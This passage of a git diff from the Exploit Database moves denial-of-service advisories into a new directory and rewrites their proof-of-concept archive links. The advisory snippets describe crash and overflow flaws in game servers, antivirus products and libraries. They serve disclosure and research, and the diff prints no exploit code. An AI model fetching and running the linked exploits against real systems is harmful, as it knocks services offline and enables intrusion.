+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24761.zip \ No newline at end of file diff --git a/platforms/multiple/dos/24763.txt b/exploits/multiple/dos/24763.txt similarity index 100% rename from platforms/multiple/dos/24763.txt rename to exploits/multiple/dos/24763.txt diff --git a/platforms/multiple/dos/24778.html b/exploits/multiple/dos/24778.html similarity index 100% rename from platforms/multiple/dos/24778.html rename to exploits/multiple/dos/24778.html diff --git a/platforms/multiple/dos/24781.html b/exploits/multiple/dos/24781.html similarity index 100% rename from platforms/multiple/dos/24781.html rename to exploits/multiple/dos/24781.html diff --git a/platforms/multiple/dos/24793.txt b/exploits/multiple/dos/24793.txt similarity index 94% rename from platforms/multiple/dos/24793.txt rename to exploits/multiple/dos/24793.txt index ada77f1f5..0577f8f2e 100644 --- a/platforms/multiple/dos/24793.txt +++ b/exploits/multiple/dos/24793.txt @@ -8,4 +8,4 @@ The first issue presents itself when malformed HTTP requests are made to the aff An attacker may leverage these issues to cause the affected proxy server to hang, effectively denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24793.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24793.zip \ No newline at end of file diff --git a/platforms/multiple/dos/24799.txt b/exploits/multiple/dos/24799.txt similarity index 100% rename from platforms/multiple/dos/24799.txt rename to exploits/multiple/dos/24799.txt diff --git a/platforms/multiple/dos/24805.txt b/exploits/multiple/dos/24805.txt similarity index 100% rename from platforms/multiple/dos/24805.txt rename to exploits/multiple/dos/24805.txt diff --git a/platforms/multiple/dos/24807.txt b/exploits/multiple/dos/24807.txt similarity index 96% rename from platforms/multiple/dos/24807.txt rename to exploits/multiple/dos/24807.txt index 7f3397dd5..6469280c5 100644 --- a/platforms/multiple/dos/24807.txt +++ b/exploits/multiple/dos/24807.txt @@ -10,4 +10,4 @@ At this time, preimage attacks are not reportedly possible. It is recommended that cryptosystems that utilize the MD5 algorithm should be reviewed, and the measures should be taken to protect against this weakness. Other hashing algorithms may possibly be utilized in replacement to, or in conjunction with MD5 to decrease the likelihood of a successful attack. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24807.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24807.tar.gz \ No newline at end of file diff --git a/platforms/multiple/dos/24809.txt b/exploits/multiple/dos/24809.txt similarity index 100% rename from platforms/multiple/dos/24809.txt rename to exploits/multiple/dos/24809.txt diff --git a/platforms/multiple/dos/24818.txt b/exploits/multiple/dos/24818.txt similarity index 93% rename from platforms/multiple/dos/24818.txt rename to exploits/multiple/dos/24818.txt index 7411c1b5e..b29b7cd74 100644 --- a/platforms/multiple/dos/24818.txt +++ b/exploits/multiple/dos/24818.txt @@ -4,4 +4,4 @@ A remote denial of service vulnerability reportedly affects Digital Illusions CE An attacker may leverage this issue to cause the affected application to stop responding to network-based messages, effectively denying service to legitimate, remote users. Due to the nature of the network protocol used by the affected application an attacker may spoof their network identity, facilitating anonymous exploitation. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24818.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24818.zip \ No newline at end of file diff --git a/platforms/multiple/dos/25056.html b/exploits/multiple/dos/25056.html similarity index 100% rename from platforms/multiple/dos/25056.html rename to exploits/multiple/dos/25056.html diff --git a/platforms/multiple/dos/25075.pl b/exploits/multiple/dos/25075.pl similarity index 100% rename from platforms/multiple/dos/25075.pl rename to exploits/multiple/dos/25075.pl diff --git a/platforms/multiple/dos/25081.txt b/exploits/multiple/dos/25081.txt similarity index 91% rename from platforms/multiple/dos/25081.txt rename to exploits/multiple/dos/25081.txt index c76f21359..596739350 100644 --- a/platforms/multiple/dos/25081.txt +++ b/exploits/multiple/dos/25081.txt @@ -4,4 +4,4 @@ LANChat Pro Revival is reported prone to a remote denial of service vulnerabilit A remote attacker may exploit this vulnerability to crash the affected application effectively denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25081.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25081.zip \ No newline at end of file diff --git a/platforms/multiple/dos/2515.txt b/exploits/multiple/dos/2515.txt similarity index 100% rename from platforms/multiple/dos/2515.txt rename to exploits/multiple/dos/2515.txt diff --git a/platforms/multiple/dos/25165.c b/exploits/multiple/dos/25165.c similarity index 100% rename from platforms/multiple/dos/25165.c rename to exploits/multiple/dos/25165.c diff --git a/platforms/multiple/dos/25171.txt b/exploits/multiple/dos/25171.txt similarity index 91% rename from platforms/multiple/dos/25171.txt rename to exploits/multiple/dos/25171.txt index 92b0e0a20..93b84da32 100644 --- a/platforms/multiple/dos/25171.txt +++ b/exploits/multiple/dos/25171.txt @@ -6,4 +6,4 @@ It is reported that the game server crashes when handling various errors. Scrapland 1.0 and prior versions are affected by these issues. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25171.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25171.zip \ No newline at end of file diff --git a/platforms/multiple/dos/25387.txt b/exploits/multiple/dos/25387.txt similarity index 96% rename from platforms/multiple/dos/25387.txt rename to exploits/multiple/dos/25387.txt index 2b6888b4e..337ed129b 100644 --- a/platforms/multiple/dos/25387.txt +++ b/exploits/multiple/dos/25387.txt @@ -22,4 +22,4 @@ A remote attacker may exploit this issue to degrade the performance of TCP conne **Update: Microsoft platforms are also reported prone to these issues. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25387.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25387.tar.gz \ No newline at end of file diff --git a/platforms/multiple/dos/25388.txt b/exploits/multiple/dos/25388.txt similarity index 96% rename from platforms/multiple/dos/25388.txt rename to exploits/multiple/dos/25388.txt index aa614b2c5..b09b30c92 100644 --- a/platforms/multiple/dos/25388.txt +++ b/exploits/multiple/dos/25388.txt @@ -22,4 +22,4 @@ A remote attacker may exploit this issue to degrade the performance of TCP conne **Update: Microsoft platforms are also reported prone to these issues. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25388.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25388.tar.gz \ No newline at end of file diff --git a/platforms/multiple/dos/25389.txt b/exploits/multiple/dos/25389.txt similarity index 96% rename from platforms/multiple/dos/25389.txt rename to exploits/multiple/dos/25389.txt index d349734ff..09bc9139f 100644 --- a/platforms/multiple/dos/25389.txt +++ b/exploits/multiple/dos/25389.txt @@ -22,4 +22,4 @@ A remote attacker may exploit this issue to degrade the performance of TCP conne **Update: Microsoft platforms are also reported prone to these issues. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25389.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25389.tar.gz \ No newline at end of file diff --git a/platforms/multiple/dos/25393.txt b/exploits/multiple/dos/25393.txt similarity index 100% rename from platforms/multiple/dos/25393.txt rename to exploits/multiple/dos/25393.txt diff --git a/platforms/multiple/dos/25439.c b/exploits/multiple/dos/25439.c similarity index 100% rename from platforms/multiple/dos/25439.c rename to exploits/multiple/dos/25439.c diff --git a/platforms/multiple/dos/25470.txt b/exploits/multiple/dos/25470.txt similarity index 100% rename from platforms/multiple/dos/25470.txt rename to exploits/multiple/dos/25470.txt diff --git a/platforms/multiple/dos/25584.txt b/exploits/multiple/dos/25584.txt similarity index 94% rename from platforms/multiple/dos/25584.txt rename to exploits/multiple/dos/25584.txt index 50947fe92..4f382089f 100644 --- a/platforms/multiple/dos/25584.txt +++ b/exploits/multiple/dos/25584.txt @@ -4,4 +4,4 @@ The Mtp-Target server is prone to a memory corruption vulnerability. The issue e Immediate consequences of exploitation of this vulnerability are a denial of service. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25584.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25584.zip \ No newline at end of file diff --git a/platforms/multiple/dos/25692.txt b/exploits/multiple/dos/25692.txt similarity index 90% rename from platforms/multiple/dos/25692.txt rename to exploits/multiple/dos/25692.txt index 00ff9866a..8d455152e 100644 --- a/platforms/multiple/dos/25692.txt +++ b/exploits/multiple/dos/25692.txt @@ -4,4 +4,4 @@ Warrior Kings: Battles is susceptible to a remote denial of service vulnerabilit This vulnerability allows remote attackers to crash affected game servers, denying access to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25692.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25692.zip \ No newline at end of file diff --git a/platforms/multiple/dos/25757.txt b/exploits/multiple/dos/25757.txt similarity index 88% rename from platforms/multiple/dos/25757.txt rename to exploits/multiple/dos/25757.txt index 013e55bc5..4faa6e9db 100644 --- a/platforms/multiple/dos/25757.txt +++ b/exploits/multiple/dos/25757.txt @@ -6,4 +6,4 @@ The issue arises when the game server handles a specially crafted packet. Stronghold 2 1.2 and prior versions are affected by this vulnerability. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25757.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25757.zip \ No newline at end of file diff --git a/platforms/multiple/dos/25791.txt b/exploits/multiple/dos/25791.txt similarity index 91% rename from platforms/multiple/dos/25791.txt rename to exploits/multiple/dos/25791.txt index d0b54f1fc..0c6af2116 100644 --- a/platforms/multiple/dos/25791.txt +++ b/exploits/multiple/dos/25791.txt @@ -6,4 +6,4 @@ Reportedly, the vulnerability presents itself when the library handles an empty RakNet 2.33 and prior versions released before May 30, 2005 are affected by this vulnerability. Various games employing the affected library may be vulnerable as well. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25791.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25791.zip \ No newline at end of file diff --git a/platforms/multiple/dos/25852.py b/exploits/multiple/dos/25852.py similarity index 100% rename from platforms/multiple/dos/25852.py rename to exploits/multiple/dos/25852.py diff --git a/platforms/multiple/dos/2586.pl b/exploits/multiple/dos/2586.pl similarity index 100% rename from platforms/multiple/dos/2586.pl rename to exploits/multiple/dos/2586.pl diff --git a/platforms/multiple/dos/2587.txt b/exploits/multiple/dos/2587.txt similarity index 74% rename from platforms/multiple/dos/2587.txt rename to exploits/multiple/dos/2587.txt index ce3707f99..c84208679 100644 --- a/platforms/multiple/dos/2587.txt +++ b/exploits/multiple/dos/2587.txt @@ -3,6 +3,6 @@ Damian Put pucik[at]gazeta.pl pucik[@]overflow.pl http://overflow.pl -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2 +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2 # milw0rm.com [2006-10-17] \ No newline at end of file diff --git a/platforms/multiple/dos/2597.pl b/exploits/multiple/dos/2597.pl similarity index 100% rename from platforms/multiple/dos/2597.pl rename to exploits/multiple/dos/2597.pl diff --git a/platforms/multiple/dos/26145.c b/exploits/multiple/dos/26145.c similarity index 100% rename from platforms/multiple/dos/26145.c rename to exploits/multiple/dos/26145.c diff --git a/platforms/multiple/dos/26325.txt b/exploits/multiple/dos/26325.txt similarity index 100% rename from platforms/multiple/dos/26325.txt rename to exploits/multiple/dos/26325.txt diff --git a/platforms/multiple/dos/26331.txt b/exploits/multiple/dos/26331.txt similarity index 100% rename from platforms/multiple/dos/26331.txt rename to exploits/multiple/dos/26331.txt diff --git a/platforms/multiple/dos/26336.txt b/exploits/multiple/dos/26336.txt similarity index 100% rename from platforms/multiple/dos/26336.txt rename to exploits/multiple/dos/26336.txt diff --git a/platforms/multiple/dos/26710.txt b/exploits/multiple/dos/26710.txt similarity index 100% rename from platforms/multiple/dos/26710.txt rename to exploits/multiple/dos/26710.txt diff --git a/platforms/multiple/dos/26762.html b/exploits/multiple/dos/26762.html similarity index 100% rename from platforms/multiple/dos/26762.html rename to exploits/multiple/dos/26762.html diff --git a/platforms/multiple/dos/26922.pl b/exploits/multiple/dos/26922.pl similarity index 100% rename from platforms/multiple/dos/26922.pl rename to exploits/multiple/dos/26922.pl diff --git a/platforms/multiple/dos/2695.html b/exploits/multiple/dos/2695.html similarity index 100% rename from platforms/multiple/dos/2695.html rename to exploits/multiple/dos/2695.html diff --git a/platforms/multiple/dos/26967.txt b/exploits/multiple/dos/26967.txt similarity index 100% rename from platforms/multiple/dos/26967.txt rename to exploits/multiple/dos/26967.txt diff --git a/platforms/multiple/dos/27026.txt b/exploits/multiple/dos/27026.txt similarity index 100% rename from platforms/multiple/dos/27026.txt rename to exploits/multiple/dos/27026.txt diff --git a/platforms/multiple/dos/27094.txt b/exploits/multiple/dos/27094.txt similarity index 100% rename from platforms/multiple/dos/27094.txt rename to exploits/multiple/dos/27094.txt diff --git a/platforms/multiple/dos/27108.txt b/exploits/multiple/dos/27108.txt similarity index 92% rename from platforms/multiple/dos/27108.txt rename to exploits/multiple/dos/27108.txt index 276ee727c..e94575e2f 100644 --- a/platforms/multiple/dos/27108.txt +++ b/exploits/multiple/dos/27108.txt @@ -8,4 +8,4 @@ Successful exploitation can allow attackers to trigger a denial of service condi Dual DHCP DNS Server 1.0 is reported to be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27108.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27108.zip \ No newline at end of file diff --git a/platforms/multiple/dos/27140.txt b/exploits/multiple/dos/27140.txt similarity index 93% rename from platforms/multiple/dos/27140.txt rename to exploits/multiple/dos/27140.txt index eb3106805..151d60156 100644 --- a/platforms/multiple/dos/27140.txt +++ b/exploits/multiple/dos/27140.txt @@ -6,4 +6,4 @@ This issue allows attackers to crash applications that use the affected library This issue is present in Exiv2 versions prior to 0.9. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27140.jpg \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27140.jpg \ No newline at end of file diff --git a/platforms/multiple/dos/27159.txt b/exploits/multiple/dos/27159.txt similarity index 100% rename from platforms/multiple/dos/27159.txt rename to exploits/multiple/dos/27159.txt diff --git a/platforms/multiple/dos/27171.txt b/exploits/multiple/dos/27171.txt similarity index 100% rename from platforms/multiple/dos/27171.txt rename to exploits/multiple/dos/27171.txt diff --git a/platforms/multiple/dos/27196.txt b/exploits/multiple/dos/27196.txt similarity index 100% rename from platforms/multiple/dos/27196.txt rename to exploits/multiple/dos/27196.txt diff --git a/platforms/multiple/dos/27210.txt b/exploits/multiple/dos/27210.txt similarity index 100% rename from platforms/multiple/dos/27210.txt rename to exploits/multiple/dos/27210.txt diff --git a/platforms/multiple/dos/27211.txt b/exploits/multiple/dos/27211.txt similarity index 100% rename from platforms/multiple/dos/27211.txt rename to exploits/multiple/dos/27211.txt diff --git a/platforms/multiple/dos/27212.txt b/exploits/multiple/dos/27212.txt similarity index 100% rename from platforms/multiple/dos/27212.txt rename to exploits/multiple/dos/27212.txt diff --git a/platforms/multiple/dos/27365.txt b/exploits/multiple/dos/27365.txt similarity index 87% rename from platforms/multiple/dos/27365.txt rename to exploits/multiple/dos/27365.txt index df43d715c..d10e7bd90 100644 --- a/platforms/multiple/dos/27365.txt +++ b/exploits/multiple/dos/27365.txt @@ -4,4 +4,4 @@ The Monopd game server is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to deny service for legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27365.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27365.zip \ No newline at end of file diff --git a/platforms/multiple/dos/27420.c b/exploits/multiple/dos/27420.c similarity index 100% rename from platforms/multiple/dos/27420.c rename to exploits/multiple/dos/27420.c diff --git a/platforms/multiple/dos/27421.txt b/exploits/multiple/dos/27421.txt similarity index 100% rename from platforms/multiple/dos/27421.txt rename to exploits/multiple/dos/27421.txt diff --git a/platforms/multiple/dos/27460.pl b/exploits/multiple/dos/27460.pl similarity index 100% rename from platforms/multiple/dos/27460.pl rename to exploits/multiple/dos/27460.pl diff --git a/platforms/multiple/dos/27474.txt b/exploits/multiple/dos/27474.txt similarity index 100% rename from platforms/multiple/dos/27474.txt rename to exploits/multiple/dos/27474.txt diff --git a/platforms/multiple/dos/27547.txt b/exploits/multiple/dos/27547.txt similarity index 88% rename from platforms/multiple/dos/27547.txt rename to exploits/multiple/dos/27547.txt index c69d2ead5..5b3ea8147 100644 --- a/platforms/multiple/dos/27547.txt +++ b/exploits/multiple/dos/27547.txt @@ -9,4 +9,4 @@ A remote denial of service condition also affects the server. ZDaemon 1.08.01 and prior versions are affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27547.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27547.zip \ No newline at end of file diff --git a/platforms/multiple/dos/27566.txt b/exploits/multiple/dos/27566.txt similarity index 100% rename from platforms/multiple/dos/27566.txt rename to exploits/multiple/dos/27566.txt diff --git a/platforms/multiple/dos/27639.txt b/exploits/multiple/dos/27639.txt similarity index 100% rename from platforms/multiple/dos/27639.txt rename to exploits/multiple/dos/27639.txt diff --git a/platforms/multiple/dos/27640.txt b/exploits/multiple/dos/27640.txt similarity index 100% rename from platforms/multiple/dos/27640.txt rename to exploits/multiple/dos/27640.txt diff --git a/platforms/multiple/dos/27668.c b/exploits/multiple/dos/27668.c similarity index 100% rename from platforms/multiple/dos/27668.c rename to exploits/multiple/dos/27668.c diff --git a/platforms/multiple/dos/27730.py b/exploits/multiple/dos/27730.py similarity index 100% rename from platforms/multiple/dos/27730.py rename to exploits/multiple/dos/27730.py diff --git a/platforms/multiple/dos/27901.java b/exploits/multiple/dos/27901.java similarity index 100% rename from platforms/multiple/dos/27901.java rename to exploits/multiple/dos/27901.java diff --git a/platforms/multiple/dos/27915.pl b/exploits/multiple/dos/27915.pl similarity index 100% rename from platforms/multiple/dos/27915.pl rename to exploits/multiple/dos/27915.pl diff --git a/platforms/multiple/dos/27969.c b/exploits/multiple/dos/27969.c similarity index 100% rename from platforms/multiple/dos/27969.c rename to exploits/multiple/dos/27969.c diff --git a/platforms/multiple/dos/27993.txt b/exploits/multiple/dos/27993.txt similarity index 91% rename from platforms/multiple/dos/27993.txt rename to exploits/multiple/dos/27993.txt index 44639d8de..f93aa163f 100644 --- a/platforms/multiple/dos/27993.txt +++ b/exploits/multiple/dos/27993.txt @@ -6,4 +6,4 @@ This issue allows remote attackers to crash applications that use the affected l FreeType versions prior to 2.2.1 are vulnerable to this issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27993.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27993.zip \ No newline at end of file diff --git a/platforms/multiple/dos/28065.vmx b/exploits/multiple/dos/28065.vmx similarity index 100% rename from platforms/multiple/dos/28065.vmx rename to exploits/multiple/dos/28065.vmx diff --git a/platforms/multiple/dos/28182.java b/exploits/multiple/dos/28182.java similarity index 100% rename from platforms/multiple/dos/28182.java rename to exploits/multiple/dos/28182.java diff --git a/platforms/multiple/dos/28277.txt b/exploits/multiple/dos/28277.txt similarity index 100% rename from platforms/multiple/dos/28277.txt rename to exploits/multiple/dos/28277.txt diff --git a/platforms/multiple/dos/28293.txt b/exploits/multiple/dos/28293.txt similarity index 100% rename from platforms/multiple/dos/28293.txt rename to exploits/multiple/dos/28293.txt diff --git a/platforms/multiple/dos/28345.txt b/exploits/multiple/dos/28345.txt similarity index 90% rename from platforms/multiple/dos/28345.txt rename to exploits/multiple/dos/28345.txt index 29f7e264e..ca726b64f 100644 --- a/platforms/multiple/dos/28345.txt +++ b/exploits/multiple/dos/28345.txt @@ -8,4 +8,4 @@ An attacker can exploit this issue to crash the server, causing a denial-of-serv Version 0.7.0, CVS July 30th 2006 and prior versions are vulnerable to this issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28345.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28345.zip \ No newline at end of file diff --git a/platforms/multiple/dos/28361.c b/exploits/multiple/dos/28361.c similarity index 100% rename from platforms/multiple/dos/28361.c rename to exploits/multiple/dos/28361.c diff --git a/platforms/multiple/dos/28491.txt b/exploits/multiple/dos/28491.txt similarity index 100% rename from platforms/multiple/dos/28491.txt rename to exploits/multiple/dos/28491.txt diff --git a/platforms/multiple/dos/28542.pl b/exploits/multiple/dos/28542.pl similarity index 100% rename from platforms/multiple/dos/28542.pl rename to exploits/multiple/dos/28542.pl diff --git a/platforms/multiple/dos/28561.pl b/exploits/multiple/dos/28561.pl similarity index 100% rename from platforms/multiple/dos/28561.pl rename to exploits/multiple/dos/28561.pl diff --git a/platforms/multiple/dos/2857.php b/exploits/multiple/dos/2857.php similarity index 100% rename from platforms/multiple/dos/2857.php rename to exploits/multiple/dos/2857.php diff --git a/platforms/multiple/dos/28666.txt b/exploits/multiple/dos/28666.txt similarity index 92% rename from platforms/multiple/dos/28666.txt rename to exploits/multiple/dos/28666.txt index 0d0680497..5fe508508 100644 --- a/platforms/multiple/dos/28666.txt +++ b/exploits/multiple/dos/28666.txt @@ -4,4 +4,4 @@ Call of Duty server is prone to a remote buffer-overflow vulnerability because i Exploiting this issue may allow remote attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28666.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28666.zip \ No newline at end of file diff --git a/platforms/multiple/dos/28679.txt b/exploits/multiple/dos/28679.txt similarity index 100% rename from platforms/multiple/dos/28679.txt rename to exploits/multiple/dos/28679.txt diff --git a/platforms/multiple/dos/28726.pl b/exploits/multiple/dos/28726.pl similarity index 100% rename from platforms/multiple/dos/28726.pl rename to exploits/multiple/dos/28726.pl diff --git a/platforms/multiple/dos/2910.txt b/exploits/multiple/dos/2910.txt similarity index 67% rename from platforms/multiple/dos/2910.txt rename to exploits/multiple/dos/2910.txt index 19ecaca58..ba5cafa09 100644 --- a/platforms/multiple/dos/2910.txt +++ b/exploits/multiple/dos/2910.txt @@ -1,5 +1,5 @@ Sophos Antivirus CHM File Heap Overflow Vulnerability -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2910.chm (12092006-sophos_chunkheap.chm) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/2910.chm (12092006-sophos_chunkheap.chm) # milw0rm.com [2006-12-10] \ No newline at end of file diff --git a/platforms/multiple/dos/2911.txt b/exploits/multiple/dos/2911.txt similarity index 70% rename from platforms/multiple/dos/2911.txt rename to exploits/multiple/dos/2911.txt index d55f49c8d..42b45e747 100644 --- a/platforms/multiple/dos/2911.txt +++ b/exploits/multiple/dos/2911.txt @@ -1,5 +1,5 @@ Sophos Antivirus CHM Chunk Name Length Memory Corruption Vulnerability -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2911.chm (12092006-sophos_namelen.chm) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/2911.chm (12092006-sophos_namelen.chm) # milw0rm.com [2006-12-10] \ No newline at end of file diff --git a/platforms/multiple/dos/2912.txt b/exploits/multiple/dos/2912.txt similarity index 68% rename from platforms/multiple/dos/2912.txt rename to exploits/multiple/dos/2912.txt index a503ecc98..7baca5299 100644 --- a/platforms/multiple/dos/2912.txt +++ b/exploits/multiple/dos/2912.txt @@ -1,5 +1,5 @@ Multiple Vendor Antivirus RAR File Denial of Service Vulnerability -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2912.rar (12102006-sophos_intifiniti.rar) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/2912.rar (12102006-sophos_intifiniti.rar) # milw0rm.com [2006-12-10] \ No newline at end of file diff --git a/platforms/multiple/dos/29305.txt b/exploits/multiple/dos/29305.txt similarity index 100% rename from platforms/multiple/dos/29305.txt rename to exploits/multiple/dos/29305.txt diff --git a/platforms/multiple/dos/29310.txt b/exploits/multiple/dos/29310.txt similarity index 100% rename from platforms/multiple/dos/29310.txt rename to exploits/multiple/dos/29310.txt diff --git a/platforms/multiple/dos/29362.pl b/exploits/multiple/dos/29362.pl similarity index 100% rename from platforms/multiple/dos/29362.pl rename to exploits/multiple/dos/29362.pl diff --git a/platforms/multiple/dos/2947.pl b/exploits/multiple/dos/2947.pl similarity index 100% rename from platforms/multiple/dos/2947.pl rename to exploits/multiple/dos/2947.pl diff --git a/platforms/multiple/dos/2949.c b/exploits/multiple/dos/2949.c similarity index 100% rename from platforms/multiple/dos/2949.c rename to exploits/multiple/dos/2949.c diff --git a/platforms/multiple/dos/29502.html b/exploits/multiple/dos/29502.html similarity index 100% rename from platforms/multiple/dos/29502.html rename to exploits/multiple/dos/29502.html diff --git a/platforms/multiple/dos/29875.py b/exploits/multiple/dos/29875.py similarity index 100% rename from platforms/multiple/dos/29875.py rename to exploits/multiple/dos/29875.py diff --git a/platforms/multiple/dos/29900.txt b/exploits/multiple/dos/29900.txt similarity index 100% rename from platforms/multiple/dos/29900.txt rename to exploits/multiple/dos/29900.txt diff --git a/platforms/multiple/dos/29901.txt b/exploits/multiple/dos/29901.txt similarity index 100% rename from platforms/multiple/dos/29901.txt rename to exploits/multiple/dos/29901.txt diff --git a/platforms/multiple/dos/30139.c b/exploits/multiple/dos/30139.c similarity index 100% rename from platforms/multiple/dos/30139.c rename to exploits/multiple/dos/30139.c diff --git a/platforms/multiple/dos/30163.html b/exploits/multiple/dos/30163.html similarity index 100% rename from platforms/multiple/dos/30163.html rename to exploits/multiple/dos/30163.html diff --git a/platforms/multiple/dos/30187.txt b/exploits/multiple/dos/30187.txt similarity index 100% rename from platforms/multiple/dos/30187.txt rename to exploits/multiple/dos/30187.txt diff --git a/platforms/multiple/dos/30497.c b/exploits/multiple/dos/30497.c similarity index 100% rename from platforms/multiple/dos/30497.c rename to exploits/multiple/dos/30497.c diff --git a/platforms/multiple/dos/30498.txt b/exploits/multiple/dos/30498.txt similarity index 88% rename from platforms/multiple/dos/30498.txt rename to exploits/multiple/dos/30498.txt index e4d216ce2..5117209cc 100644 --- a/platforms/multiple/dos/30498.txt +++ b/exploits/multiple/dos/30498.txt @@ -4,4 +4,4 @@ Live For Speed is prone to four vulnerabilities, including buffer-overflow and d Successful exploits could allow attackers to execute arbitrary code or to crash game servers. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30498.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30498.zip \ No newline at end of file diff --git a/platforms/multiple/dos/30513.txt b/exploits/multiple/dos/30513.txt similarity index 91% rename from platforms/multiple/dos/30513.txt rename to exploits/multiple/dos/30513.txt index bc2571347..2a5bea438 100644 --- a/platforms/multiple/dos/30513.txt +++ b/exploits/multiple/dos/30513.txt @@ -8,5 +8,5 @@ Versions of Unreal Engine that are included in Unreal Tournament 2003 and 2004 a This vulnerability also affects America's Army 2.8.2 when Punkbuster is enabled on the local server; other versions may also be vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30513-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30513-2.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30513-1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30513-2.zip \ No newline at end of file diff --git a/platforms/multiple/dos/30519.txt b/exploits/multiple/dos/30519.txt similarity index 92% rename from platforms/multiple/dos/30519.txt rename to exploits/multiple/dos/30519.txt index e1522bc21..81c8eaed0 100644 --- a/platforms/multiple/dos/30519.txt +++ b/exploits/multiple/dos/30519.txt @@ -4,4 +4,4 @@ Asura Engine is prone to a remote stack-based buffer-overflow vulnerability beca An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30519.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30519.zip \ No newline at end of file diff --git a/platforms/multiple/dos/30524.txt b/exploits/multiple/dos/30524.txt similarity index 92% rename from platforms/multiple/dos/30524.txt rename to exploits/multiple/dos/30524.txt index f0dfa4207..d70e46df5 100644 --- a/platforms/multiple/dos/30524.txt +++ b/exploits/multiple/dos/30524.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues allows remote attackers to crash game serve Soldat 1.4.2 and Soldat dedicated server 2.6.2 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30524.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30524.zip \ No newline at end of file diff --git a/platforms/multiple/dos/30526.txt b/exploits/multiple/dos/30526.txt similarity index 100% rename from platforms/multiple/dos/30526.txt rename to exploits/multiple/dos/30526.txt diff --git a/platforms/multiple/dos/30527.txt b/exploits/multiple/dos/30527.txt similarity index 100% rename from platforms/multiple/dos/30527.txt rename to exploits/multiple/dos/30527.txt diff --git a/platforms/multiple/dos/30528.txt b/exploits/multiple/dos/30528.txt similarity index 100% rename from 